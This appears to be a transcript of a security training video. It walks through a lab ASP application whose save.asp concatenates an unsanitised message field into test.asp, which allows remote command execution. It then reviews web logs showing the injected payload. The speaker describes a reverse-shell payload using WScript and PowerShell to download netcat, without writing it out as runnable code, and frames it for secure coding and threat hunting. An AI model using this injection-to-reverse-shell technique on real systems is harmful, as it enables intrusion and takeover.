is my script. Okay, that's actually our reverse shell. So how did we write this here? How did this file get generated? Test.asp. That's what we need to figure out. Can I just take all these out of here? No, I don't think so. Can't just copy and paste like that. Paste disabled. I could grab them through the shell, but let's see. What about save.asp? Ooh, here we go. All right, so you can see that we are creating a text file called test.asp, which you may recall contains our untrusted input concatenated into the HTML source. See BR, sorry, this B is for bold, TD is for table data. So this is the HTML, and this is the ASP, and it's just concatenated directly into the application source. We have code, what you're seeing here. This is data that is being confused as code. And this file is being created by save.asp, which you can see is actually taking that message field, and it's just requesting it, and it's directly interpolating it, or I guess you could call it substituting the values of that message into the output of the HTML. And since there is no sanitization being done here, actually I would say the vulnerability resides right here, and really in all of these strings, but this one in particular, this is what's leading to the remote command execution, and it ultimately led to full domain domination. So it's cool how you can see what led to this. And so you'd want to sanitize your ASP files, make sure that access is restricted and locked down, and it all begins with secure coding practices. And I just want to mention, I actually went back and grabbed the web application logs from the container as well. I copied those to my desktop, open the file, and we are actually getting the attack. So if I do Control F save .asp, the vulnerable application, the IP address is showing the internal Docker IP address, so the attacker's IP address is masked. But you can see where I put my name in, where I put my email address in, where I put my subject, and then this message. Scroll over, you can actually see the reverse shell. Response.write, create object, wscript, exec, command, and you see PowerShell. Downloading netcat. Here we are again. And this is actually when we were running curl against the box. That actually is our attacker IP. But it looks like the container is still this source IP here. So if you have a SIM like Gravwell or Splunk or Elastic, you would ingest these fields and then you could threat hunt for these kinds of attacks, right? Like this is normal traffic. Clearly that's normal. But when you get down here, you can see an injected payload with PowerShell, right? That's definitely cause for concern. Hope you enjoyed that. If you learned something new, definitely get the word out. Let's get more people into this so that we can build up an army of competent cyber professionals.